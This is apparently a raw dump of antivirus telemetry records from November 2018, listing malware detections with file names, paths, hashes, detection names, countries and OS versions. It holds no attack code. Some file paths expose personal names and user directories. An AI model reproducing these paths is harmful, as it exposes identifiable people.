  Row(detection=Row(filename='avscan-20181101-223716-5e800ad2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1e759919\\AVSCAN-20181101-223625-56E41FED\\AVSCAN-20181101-223716-5E800AD2', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:37:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9r8hh2f.exe', filepath='\\?\\G:\\9r8hh2f.exe', filesize=128000, name='TR/PSW.Onlineg.wsoo.#M1.#R1'), hash='64a1191bd5a069931ccdcf4097811177c23d7f0952aa4782f9919b41a2bf092c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:59:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T03:10:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered danel', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered danel', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2d05dd7d3058be10c6b4fefc70b12237fa1f77f334a6797c8e40d9df95d4b012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:05:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-093113-e330b669', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181102-092506-AD362901\\AVSCAN-20181102-093113-E330B669', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:56:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='chicken invaders 4.exe', filepath='E:\\NooN Games\\AutoPlay\\Temp\\Chicken Invaders 4\\Chicken Invaders 4.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='54ead74adf7ed441519196511e4d9d56a7cdeab303ecefe02193ed3c12917845', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:v\\\\\\/p+iezygU+0fBX2.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T10:57:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tcupdater.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\TCSystem\\TCUpdater.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='2778037bc22ff4333facb7e8bedea1523bd7a63a6a7476142b497339a65d269e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:02:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-115051-f991cab2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3a6478a3\\AVSCAN-20181101-114522-D5CE2893\\AVSCAN-20181101-115051-F991CAB2', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:52:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T09:59:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T22:05:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212610-026f5b7e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212610-026F5B7E', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:26:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='panificatore.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\ALIMENTARI\\PANIFICATORE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:11:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pureset.exe', filepath='C:\\Program Files\\Pure Codec\\Codecs\\PureSet.exe', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='b84666be3d52db8bda3cb3ecce95becbb4620ccc0644a852889a04a1f54204db', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:44:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:00:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-194538-8c1d0bcb', filepath='\\\\?\\C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a5c5c457\\AVSCAN-20181031-193652-4284189F\\AVSCAN-20181031-194538-8C1D0BCB', filesize=3904000, name='HEUR/AGEN.1033264.#M1.#R1'), hash='b90be0161709682d885171d6589758b4ed7306ecafa6694505d9cb735096c217', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:02:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2sqdxocy52f\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='-m:GeneralTel.dll -f:RunGeneralTelemetry  -cV jEkeDxqLmU+f8gaG.1.2 -SendFullTelemetry -ThrottleUtc', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T11:03:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nueva carpeta (2)                                   .scr', filepath='E:\\Nueva carpeta (2)                                   .scr', filesize=64000, name='W32/Sality.K.#M1.#R1'), hash='e562a79153316650e911a59240cf1949e94b5b45d5e72143edefd294716ab455', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T19:35:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094346-f6ba296c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094346-F6BA296C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:43:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0016814.exe', filepath='\\\\?\\D:\\System Volume Information\\_restore{4BC09F2B-3D9F-48B4-B911-965A060CD3E4}\\RP16\\A0016814.exe', filesize=320000, name='HEUR/APC.#M1.#R1'), hash='be3f5d77e6635fdc86a8179f5640fcc127ab946009115fd21138b3184de73d90', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:35:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094043-d3b841b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094043-D3B841B5', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:40:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rc_11n_wr841n_nd.dll', filepath='g:\\$recycle.bin\\s-1-5-21-536075318-3838402433-1439967234-1000\\$rwv2xs2\\برامج\\متنوعة\\cd113a5\\easysetupassistant\\wr741n\\tlres\\1032\\RC_11N_WR841N_ND.dll', filesize=1536000, name='W32/Ramnit.C.#M1.#R1'), hash='c777e7f4dfbf0815933a4a20b830c585c5c8562f37ef0f3c32be6dbfcc3a2f43', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:59:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190743-0ba2f09b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190124-CAF68D09\\AVSCAN-20181101-190743-0BA2F09B', filesize=64000, name='TR/Agent.64000.186.#M1.#R1'), hash='eb90c5e7b45131be3382699058912c5f84fa35c868f1202c3acd1ca54cb65080', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:07:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='9e7f2db891b8037ec67d537f89f81b79df205f83f0705d16cc8753d791013cd6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:56:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c67723641e9ead7dc42aca53cc3f37868cb31438562d2bc2c680fd1651038230', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\C67723641E9EAD7DC42ACA53CC3F37868CB31438562D2BC2C680FD1651038230', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c67723641e9ead7dc42aca53cc3f37868cb31438562d2bc2c680fd1651038230', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:09:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3m0zgy', filepath='/Library/Application Support/Avira/Quarantine/quarantine/rescan/3M0ZgY', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T21:05:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='allegati pag. 93 a pag. 186.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\SICUREZZA NEI LUOGHI DI LAVORO\\L.812008\\Allegati pag. 93 a pag. 186.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:26:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='epson l120.pif', filepath='F:\\EPSON L120\\EPSON L120.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gdkslwfu.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\GdkSLwFu.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='articoli.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\ITALIANO\\esercitazioni\\ARTICOLI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:25:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0048188.exe', filepath='e:\\system volume information\\_restore{68daf5b2-45b2-4aaf-8503-fb4b3a8be63c}\\rp8\\A0048188.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='a98676084090dc54c3fd136efa81b9824d1ec443433fc5b7b63c894254039619', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:28:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered facod', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered facod', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='dc26e9b5291e93bbb8f1e419cf449550fd705fd81d2a415254b31a9604c2a82e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:16:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aggettivi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\ITALIANO\\esercitazioni\\AGGETTIVI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:25:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='q_pattern_1_3prep_t2.exe', filepath='\\?\\M:\\3 اعدادى\\اللغة العربية\\نماذج الاسئلة\\q_pattern_1_3prep_t2.exe', filesize=6144000, name='W32/Viking.AT.#M1.#R1'), hash='60b033832b02cdd87a1fc3cafd3fc51c7b9e4801e53773f02d14883940f5547b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:33:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-161635-ccd21076', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-161635-CCD21076', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:16:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000106a5', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp00000636\\tmp000106a5', filesize=16384000, name='W32/CTX.#M1.#R1'), hash='0ebc01baccbf1f40311f244e531de35351a974419acd99de6740287e5d75acb0', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-04T19:17:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:01:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rossorabbitintrouble.exe', filepath='E:\\العاب\\جزرة الأرنوب\\RossoRabbitInTrouble.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='76ee4527b42e705ddd5a24dba7cb044d23dcdc20b51f8431f6071cff5bade2e3', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T21:10:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001255-7098a528', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001255-7098A528', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:44:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tirer', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tirer', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='5a1c0f7b3e01da7404c587a35dc1822cdfe5f1d736223a7df4755a19b4592470', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:18:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe89_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe89 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T01:49:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-164239-3f5b4ddc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6125d533\\AVSCAN-20181104-135312-59F9F13F\\AVSCAN-20181104-164239-3F5B4DDC', filesize=64000, name='BDS/Bladabindi.ajtu.#M1.#R1'), hash='1f8214f374633d3f9c2fe0a2899bec7a8acb0aaaad5ec699ffa8ca30d6f77e43', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:12:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:25:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='riched32.dll', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\Ipmi\\S-1-4-73\\Riched32.dll', filesize=256000, name='TR/AD.CoinLoader.B.#M1.#R1'), hash='4af82a3625f018fb014888948f76a681bbfe1b2bb6624b2002f06142f0712333', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T17:58:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0348498.exe', filepath='J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP439\\A0348498.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T09:08:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ikuwy.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\ikuwy.exe', filesize=2560000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='893cc7654068ec925e1a7d0e19b41a6c28af21c496081bfcd35113bd566566b9', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:03:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\tmp4301983\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:06:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-162335-72b4d7ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7bce52ab\\AVSCAN-20181104-161912-52AA11DC\\AVSCAN-20181104-162335-72B4D7EF', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='473d7f1ee4cd4dd4e0b2b195d9fc2f5c6389ce6787db8c2118e8ac45285deb97', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:23:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-13-51-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T13:01:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:47:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:52:05Z'), dt=datetime.date(2018, 11, 4)),
